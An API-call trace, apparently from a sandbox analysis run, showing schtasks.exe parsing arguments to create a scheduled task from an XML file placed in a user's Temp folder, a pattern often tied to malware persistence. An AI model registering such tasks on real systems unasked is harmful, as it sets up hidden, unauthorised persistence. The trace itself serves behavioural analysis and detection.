[0220.162] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|delete|") returned 8
[0220.162] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.162] lstrlenW (lpString="|delete|") returned 8
[0220.162] lstrlenW (lpString="|XML|") returned 5
[0220.162] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0
[0220.162] SetLastError (dwErrCode=0x490)
[0220.162] lstrlenW (lpString="query") returned 5
[0220.162] lstrlenW (lpString="query") returned 5
[0220.162] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.162] lstrlenW (lpString="XML") returned 3
[0220.162] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.162] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|query|") returned 7
[0220.163] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.163] lstrlenW (lpString="|query|") returned 7
[0220.163] lstrlenW (lpString="|XML|") returned 5
[0220.163] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0
[0220.163] SetLastError (dwErrCode=0x490)
[0220.163] lstrlenW (lpString="change") returned 6
[0220.163] lstrlenW (lpString="change") returned 6
[0220.163] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.163] lstrlenW (lpString="XML") returned 3
[0220.163] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.163] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|change|") returned 8
[0220.163] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.163] lstrlenW (lpString="|change|") returned 8
[0220.163] lstrlenW (lpString="|XML|") returned 5
[0220.164] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0
[0220.164] SetLastError (dwErrCode=0x490)
[0220.164] lstrlenW (lpString="run") returned 3
[0220.164] lstrlenW (lpString="run") returned 3
[0220.164] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.164] lstrlenW (lpString="XML") returned 3
[0220.164] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.164] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|run|") returned 5
[0220.164] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.164] lstrlenW (lpString="|run|") returned 5
[0220.164] lstrlenW (lpString="|XML|") returned 5
[0220.164] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0
[0220.165] SetLastError (dwErrCode=0x490)
[0220.165] lstrlenW (lpString="end") returned 3
[0220.165] lstrlenW (lpString="end") returned 3
[0220.165] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.165] lstrlenW (lpString="XML") returned 3
[0220.165] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.165] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|end|") returned 5
[0220.165] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.165] lstrlenW (lpString="|end|") returned 5
[0220.165] lstrlenW (lpString="|XML|") returned 5
[0220.165] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0
[0220.166] SetLastError (dwErrCode=0x490)
[0220.166] lstrlenW (lpString="showsid") returned 7
[0220.166] lstrlenW (lpString="showsid") returned 7
[0220.166] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.166] lstrlenW (lpString="XML") returned 3
[0220.166] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.166] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|showsid|") returned 9
[0220.166] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.166] lstrlenW (lpString="|showsid|") returned 9
[0220.166] lstrlenW (lpString="|XML|") returned 5
[0220.166] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0
[0220.166] SetLastError (dwErrCode=0x490)
[0220.166] SetLastError (dwErrCode=0x490)
[0220.167] SetLastError (dwErrCode=0x0)
[0220.167] lstrlenW (lpString="/XML") returned 4
[0220.167] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0
[0220.167] SetLastError (dwErrCode=0x490)
[0220.167] SetLastError (dwErrCode=0x0)
[0220.167] lstrlenW (lpString="/XML") returned 4
[0220.167] GetProcessHeap () returned 0x2d0000
[0220.167] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0xa) returned 0x2ec420
[0220.167] GetProcessHeap () returned 0x2d0000
[0220.167] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ece10
[0220.167] SetLastError (dwErrCode=0x0)
[0220.167] SetLastError (dwErrCode=0x0)
[0220.167] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.167] lstrlenW (lpString="-/") returned 2
[0220.168] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0220.168] SetLastError (dwErrCode=0x490)
[0220.168] SetLastError (dwErrCode=0x490)
[0220.168] SetLastError (dwErrCode=0x0)
[0220.168] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.168] StrChrIW (lpStart="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", wMatch=0x3a) returned=":\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml"
[0220.168] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.168] GetProcessHeap () returned 0x2d0000
[0220.168] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ec440
[0220.168] _memicmp (_Buf1=0x2ec440, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.168] GetProcessHeap () returned 0x2d0000
[0220.168] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0xc) returned 0x2ec460
[0220.168] GetProcessHeap () returned 0x2d0000
[0220.168] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ed670
[0220.169] _memicmp (_Buf1=0x2ed670, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.169] GetProcessHeap () returned 0x2d0000
[0220.169] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x5e) returned 0x2ede40
[0220.169] SetLastError (dwErrCode=0x7a)
[0220.169] SetLastError (dwErrCode=0x0)
[0220.169] SetLastError (dwErrCode=0x0)
[0220.169] lstrlenW (lpString="C") returned 1
[0220.169] SetLastError (dwErrCode=0x490)
[0220.169] SetLastError (dwErrCode=0x0)
[0220.169] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml") returned 44
[0220.169] GetProcessHeap () returned 0x2d0000
[0220.169] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x5a) returned 0x2edeb0
[0220.169] GetProcessHeap () returned 0x2d0000
[0220.169] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ece40
[0220.169] SetLastError (dwErrCode=0x0)
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec350) returned 1
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec350) returned 0x8
[0220.170] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec350 | out: hHeap=0x2d0000) returned 1
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd80) returned 1
[0220.170] GetProcessHeap () returned 0x2d0000
[0220.170] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecd80) returned 0x20
[0220.171] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecd80 | out: hHeap=0x2d0000) returned 1
[0220.171] GetProcessHeap () returned 0x2d0000
[0220.171] GetProcessHeap () returned 0x2d0000
[0220.171] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec3e0) returned 1
[0220.171] GetProcessHeap () returned 0x2d0000
[0220.171] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec3e0) returned 0xa
[0220.171] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec3e0 | out: hHeap=0x2d0000) returned 1
[0220.171] GetProcessHeap () returned 0x2d0000
[0220.171] GetProcessHeap () returned 0x2d0000
[0220.172] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecdb0) returned 1
[0220.172] GetProcessHeap () returned 0x2d0000
[0220.172] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecdb0) returned 0x20
[0220.172] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecdb0 | out: hHeap=0x2d0000) returned 1
[0220.172] GetProcessHeap () returned 0x2d0000
[0220.172] GetProcessHeap () returned 0x2d0000
[0220.172] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec400) returned 1
[0220.172] GetProcessHeap () returned 0x2d0000
[0220.172] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec400) returned 0x6
[0220.172] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec400 | out: hHeap=0x2d0000) returned 1
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecde0) returned 1
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ecde0) returned 0x20
[0220.173] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ecde0 | out: hHeap=0x2d0000) returned 1
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec420) returned 1
[0220.173] GetProcessHeap () returned 0x2d0000
[0220.173] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec420) returned 0xa
[0220.174] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec420 | out: hHeap=0x2d0000) returned 1
[0220.174] GetProcessHeap () returned 0x2d0000
[0220.174] GetProcessHeap () returned 0x2d0000
[0220.174] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece10) returned 1
[0220.174] GetProcessHeap () returned 0x2d0000
[0220.175] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ece10) returned 0x20
[0220.175] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece10 | out: hHeap=0x2d0000) returned 1
[0220.175] GetProcessHeap () returned 0x2d0000
[0220.175] GetProcessHeap () returned 0x2d0000
[0220.175] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2edeb0) returned 1
[0220.175] GetProcessHeap () returned 0x2d0000
[0220.175] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2edeb0) returned 0x5a
[0220.175] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2edeb0 | out: hHeap=0x2d0000) returned 1
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece40) returned 1
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ece40) returned 0x20
[0220.176] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece40 | out: hHeap=0x2d0000) returned 1
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb20) returned 1
[0220.176] GetProcessHeap () returned 0x2d0000
[0220.176] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebb20) returned 0x18
[0220.176] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ebb20 | out: hHeap=0x2d0000) returned 1
[0220.432] SetLastError (dwErrCode=0x0)
[0220.432] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0220.432] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0220.432] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0220.432] VerifyVersionInfoW (in: lpVersionInformation=0x18c240, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x18c240) returned 1
[0220.432] SetLastError (dwErrCode=0x0)
[0220.432] lstrlenW (lpString="create") returned 6
[0220.433] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0220.433] SetLastError (dwErrCode=0x490)
[0220.433] SetLastError (dwErrCode=0x0)
[0220.433] lstrlenW (lpString="create") returned 6
[0220.433] GetProcessHeap () returned 0x2d0000
[0220.433] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ece40
[0220.433] GetProcessHeap () returned 0x2d0000
[0220.433] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ed690
[0220.433] _memicmp (_Buf1=0x2ed690, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.433] GetProcessHeap () returned 0x2d0000
[0220.433] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x16) returned 0x2ed6b0
[0220.433] SetLastError (dwErrCode=0x0)
[0220.433] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.434] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ebd80, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0220.434] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0220.434] GetProcessHeap () returned 0x2d0000
[0220.434] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x74e) returned 0x2edeb0
[0220.435] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x2edeb0 | out: lpData=0x2edeb0) returned 1
[0220.435] VerQueryValueW (in: pBlock=0x2edeb0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18c328, puLen=0x18c390 | out: lplpBuffer=0x18c328*=0x2ee24c, puLen=0x18c390) returned 1
[0220.435] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.435] _vsnwprintf (in: _Buffer=0x2ebd80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x18c308 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0220.435] VerQueryValueW (in: pBlock=0x2edeb0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x18c398, puLen=0x18c388 | out: lplpBuffer=0x18c398*=0x2ee078, puLen=0x18c388) returned 1
[0220.435] lstrlenW (lpString="schtasks.exe") returned 12
[0220.436] lstrlenW (lpString="schtasks.exe") returned 12
[0220.436] lstrlenW (lpString=".EXE") returned 4
[0220.436] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0220.436] lstrlenW (lpString="schtasks.exe") returned 12
[0220.436] lstrlenW (lpString=".EXE") returned 4
[0220.436] lstrlenW (lpString="schtasks") returned 8
[0220.436] lstrlenW (lpString="/create") returned 7
[0220.436] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.436] _vsnwprintf (in: _Buffer=0x2ebd80, _BufferCount=0x19, _Format="%s %s", _ArgList=0x18c308 | out: _Buffer="schtasks /create") returned 16
[0220.436] _memicmp (_Buf1=0x2ebc00, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.436] GetProcessHeap () returned 0x2d0000
[0220.436] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ece10
[0220.436] _memicmp (_Buf1=0x2ebc20, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.436] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x2ed430, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0220.437] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0220.437] GetProcessHeap () returned 0x2d0000
[0220.437] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x30) returned 0x2e7d80
[0220.437] _vsnwprintf (in: _Buffer=0x2ec180, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x18c308 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0220.437] GetProcessHeap () returned 0x2d0000
[0220.437] GetProcessHeap () returned 0x2d0000
[0220.437] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2edeb0) returned 1
[0220.437] GetProcessHeap () returned 0x2d0000
[0220.437] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2edeb0) returned 0x74e
[0220.438] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2edeb0 | out: hHeap=0x2d0000) returned 1
[0220.438] SetLastError (dwErrCode=0x0)
[0220.438] GetThreadLocale () returned 0x409
[0220.438] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.438] lstrlenW (lpString="create") returned 6
[0220.438] GetThreadLocale () returned 0x409
[0220.438] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.438] lstrlenW (lpString="?") returned 1
[0220.438] GetThreadLocale () returned 0x409
[0220.438] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.438] lstrlenW (lpString="s") returned 1
[0220.438] GetThreadLocale () returned 0x409
[0220.438] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.438] lstrlenW (lpString="u") returned 1
[0220.439] GetThreadLocale () returned 0x409
[0220.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.439] lstrlenW (lpString="p") returned 1
[0220.439] GetThreadLocale () returned 0x409
[0220.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.439] lstrlenW (lpString="ru") returned 2
[0220.439] GetThreadLocale () returned 0x409
[0220.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.439] lstrlenW (lpString="rp") returned 2
[0220.439] GetThreadLocale () returned 0x409
[0220.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.439] lstrlenW (lpString="sc") returned 2
[0220.439] GetThreadLocale () returned 0x409
[0220.439] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.439] lstrlenW (lpString="mo") returned 2
[0220.439] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="d") returned 1
[0220.440] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="m") returned 1
[0220.440] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="i") returned 1
[0220.440] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="tn") returned 2
[0220.440] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="tr") returned 2
[0220.440] GetThreadLocale () returned 0x409
[0220.440] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.440] lstrlenW (lpString="st") returned 2
[0220.441] GetThreadLocale () returned 0x409
[0220.441] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.441] lstrlenW (lpString="sd") returned 2
[0220.441] GetThreadLocale () returned 0x409
[0220.441] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.441] lstrlenW (lpString="ed") returned 2
[0220.441] GetThreadLocale () returned 0x409
[0220.441] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.441] lstrlenW (lpString="it") returned 2
[0220.441] GetThreadLocale () returned 0x409
[0220.441] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.441] lstrlenW (lpString="et") returned 2
[0220.441] GetThreadLocale () returned 0x409
[0220.441] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.441] lstrlenW (lpString="k") returned 1
[0220.442] GetThreadLocale () returned 0x409
[0220.442] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.442] lstrlenW (lpString="du") returned 2
[0220.442] GetThreadLocale () returned 0x409
[0220.442] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.442] lstrlenW (lpString="ri") returned 2
[0220.442] GetThreadLocale () returned 0x409
[0220.442] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.442] lstrlenW (lpString="z") returned 1
[0220.442] GetThreadLocale () returned 0x409
[0220.442] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.442] lstrlenW (lpString="f") returned 1
[0220.442] GetThreadLocale () returned 0x409
[0220.442] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="v1") returned 2
[0220.443] GetThreadLocale () returned 0x409
[0220.443] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="xml") returned 3
[0220.443] GetThreadLocale () returned 0x409
[0220.443] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="ec") returned 2
[0220.443] GetThreadLocale () returned 0x409
[0220.443] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="rl") returned 2
[0220.443] GetThreadLocale () returned 0x409
[0220.443] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="delay") returned 5
[0220.443] GetThreadLocale () returned 0x409
[0220.443] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0220.443] lstrlenW (lpString="np") returned 2
[0220.443] SetLastError (dwErrCode=0x0)
[0220.443] SetLastError (dwErrCode=0x0)
[0220.443] lstrlenW (lpString="/Create") returned 7
[0220.444] lstrlenW (lpString="-/") returned 2
[0220.444] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0220.444] lstrlenW (lpString="create") returned 6
[0220.444] lstrlenW (lpString="create") returned 6
[0220.444] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.444] lstrlenW (lpString="Create") returned 6
[0220.444] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.444] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|create|") returned 8
[0220.444] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|Create|") returned 8
[0220.444] lstrlenW (lpString="|create|") returned 8
[0220.444] lstrlenW (lpString="|Create|") returned 8
[0220.444] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0220.444] SetLastError (dwErrCode=0x0)
[0220.444] SetLastError (dwErrCode=0x0)
[0220.445] SetLastError (dwErrCode=0x0)
[0220.445] lstrlenW (lpString="/TN") returned 3
[0220.445] lstrlenW (lpString="-/") returned 2
[0220.445] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0220.445] lstrlenW (lpString="create") returned 6
[0220.445] lstrlenW (lpString="create") returned 6
[0220.445] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.445] lstrlenW (lpString="TN") returned 2
[0220.445] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.445] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|create|") returned 8
[0220.445] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18c318 | out: _Buffer="|TN|") returned 4
[0220.445] lstrlenW (lpString="|create|") returned 8
[0220.571] lstrlenW (lpString="|TN|") returned 4
[0220.571] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0220.571] SetLastError (dwErrCode=0x490)
[0220.571] lstrlenW (lpString="?") returned 1
[0220.571] lstrlenW (lpString="?") returned 1
[0220.571] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.572] lstrlenW (lpString="TN") returned 2
[0220.572] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
